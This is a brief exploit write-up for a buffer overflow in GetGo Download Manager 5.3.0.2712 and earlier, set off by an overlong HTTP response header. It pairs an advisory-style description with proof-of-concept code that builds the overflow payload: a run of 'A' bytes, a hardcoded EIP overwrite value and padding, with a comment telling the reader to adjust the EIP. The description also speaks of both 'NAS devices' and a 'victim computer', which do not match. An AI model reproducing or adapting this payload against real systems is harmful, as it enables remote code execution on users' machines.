A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.

evilbuffer = "A" * 4105 hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo :). As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this. pads = "C"*(6000 - len(evilbuffer + hardCodedEIP)) payload = evilbuffer + hardCodedEIP + pads